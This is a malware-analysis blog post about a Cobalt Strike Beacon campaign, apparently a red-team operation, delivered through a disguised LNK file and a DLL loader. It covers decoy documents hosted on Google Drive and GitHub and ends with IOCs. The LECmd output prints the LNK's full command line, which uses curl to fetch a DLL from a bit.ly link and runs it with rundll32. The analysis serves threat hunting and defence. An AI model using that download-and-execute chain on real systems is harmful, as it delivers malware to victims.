Introduction
Hello. I am morimolymoly.
I accidentally hunted unknown RedTeam's (I guess) CobaltStrike Beacon.
I tweeted this case in 2022.
LNK -> PDF, Malware(Shellcode: CobaltStrike Beacon)
— moly (@morimolymoly2) 2022年12月14日
C2: 18.65.162[.]119:443
VT: https://t.co/QrHpUuSUaB
shellcode: https://t.co/1fBJ0KqM9k
pdb: C:\Users\win10\source\repos\SysLoaderDll2Sandbox\x64\Debug\SysloaderDLL2Sandbox.pdb pic.twitter.com/UeH1R4hBkm
Hunting
I hunted DPRK's CryptoMimic campaign with VirusTotal LiveHunt. However, different actor which uses similar TTPs had been caught accidentally.
TTPs
CryptoMimic used malicous LNK file which has bitly link to malware. This TTP is similar to this case.
However, this threat actor abused GitHub and Google Drive.
This is funny point of this.
Analysis
I analyzed LNK file with LECmd.
LECmd version 1.5.0.0 Author: Eric Zimmerman (saericzimmerman@gmail.com) https://github.com/EricZimmerman/LECmd Command line: -f .\aaaaaa.lnk Warning: Administrator privileges not found! Processing C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk Source file: C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk Source created: 2022-12-13 23:33:36 Source modified: 2022-12-13 23:33:36 Source accessed: 2022-12-13 23:33:36 --- Header --- Target created: 2022-10-21 16:53:41 Target modified: 2022-10-21 16:53:41 Target accessed: 2022-12-12 10:46:28 File size: 236,544 Flags: HasTargetIdList, HasLinkInfo, HasArguments, HasIconLocation, IsUnicode, HasExpString File attributes: FileAttributeArchive Icon index: 0 Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.) Arguments: /c "start /B C:\"Program Files (x86)"\Microsoft\Edge\Application\msedge.exe --kiosk https://bit.ly/3Pkc8Kw & start /B C:\Windows\System32\curl.exe -s -L -o %temp%\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\t.dll,mydllmain" Icon Location: %ProgramW6432%\Adobe\Acrobat DC\Acrobat\Acrobat.exe --- Link information --- Flags: VolumeIdAndLocalBasePath >> Volume information Drive type: Fixed storage media (Hard drive) Serial number: 4843E915 Label: (No label) Local path: C:\Windows\System32\cmd.exe --- Target ID information (Format: Type ==> Value) --- Absolute path: My Computer\C:\\\ -Root folder: GUID ==> My Computer -Drive letter ==> C: -Directory ==> (None) Short name: Windows Modified: 2022-12-12 10:01:44 Extension block count: 1 --------- Block 0 (Beef0004) --------- Long name: Created: 2019-12-07 09:03:46 Last access: 2022-12-12 10:01:44 MFT entry/sequence #: 134345/125 (0x20CC9/0x7D) -Directory ==> (None) Short name: System32 Modified: 2022-11-24 14:04:08 Extension block count: 1 --------- Block 0 (Beef0004) --------- Long name: Created: 2019-12-07 09:03:46 Last access: 2022-12-12 10:51:08 MFT entry/sequence #: 207770/58 (0x32B9A/0x3A) -File ==> (None) Short name: cmd.exe Modified: 2022-10-21 16:53:42 Extension block count: 1 --------- Block 0 (Beef0004) --------- Long name: Created: 2022-10-21 16:53:42 Last access: 2022-12-12 10:46:30 MFT entry/sequence #: 378353/49 (0x5C5F1/0x31) --- End Target ID information --- --- Extra blocks information --- >> Environment variable data block Environment variables: %COMSPEC% >> Special folder data block Special Folder ID: 37 >> Known folder data block Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32 >> Tracker database block Machine ID: vm01 MAC Address: 08:00:27:68:4d:30 MAC Vendor: PCS SYSTEMTECHNIK Creation: 2022-11-28 11:27:11 Volume Droid: 66055d2a-26cb-4919-96d2-3aff711ffc8b Volume Droid Birth: 66055d2a-26cb-4919-96d2-3aff711ffc8b File Droid: 99cf2333-6f0f-11ed-b3f3-080027684d30 File Droid birth: 99cf2333-6f0f-11ed-b3f3-080027684d30 >> Property store data block (Format: GUID\ID Description ==> Value) 46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-2536987187-3715387138-3086421273-1001 446d16b1-8dad-4870-a748-402ea43d788c\104 Volume Id ==> Unmapped GUID: 72f0c558-0000-0000-0000-501f00000000
This LNK file does download malware(DLL, t.dll) from bitly link and launch t.dll's mydllmain function.
It seems that naming is so cheap.
I guessed that this did not be done by BlueNoroff.
I stated to analyze malware itself.
Sample's VT is below.
It create IE process and inject shellcode.
Shellcode is XORed as you can see.
I dumped shellcode with x64dbg.
Shellcode is below.
I found interesting string from malware.(t.dll)
So I call this malware as SysLoader.
When you launch SysLoader, you can see decoy document file while shellcode(CobaltStrike Beacon) is running.
SysLoader is accessed by bitly's link but this was hosted by GitHub repo.
Web service abuse
Decoy document was hosted by Google Drive.
SysLoader was hosted by GitHub.
Maldoc is also hosted as you can see.
I did OleVba to this maldoc. It contains macro which download and kick SysLoader.
Here is commit log of repository.
I just want to see the traffic so I launched FakeNet-NG and see whats going on.
Then I realized this is CobaltStrike Beacon and profile is Pandora.
CobaltStrike Beacon's watermark is 546921291.
This watermark seems legit one. So I attributed this actor as some RedTeam. C2 server is located on AWS Japan Region. This does not make sence for APTs.
Summary
This actor seems some RedTeamer of some company.
Malware itself is so cheap to analyze.
There is no obfuscation or packer.
I guess Cobalt Strike Beacon is original and legit one from seeing watermark.
I think that this operation was done by some RedTeam to test it's TTPs.
IOCs
- hxxps://github.com/encerepo/resources
- 38.242.255[.]184
- C2: dqfkmwvib0lbb[.]cloudfront[.]net
- C2: 18.65.152[.]13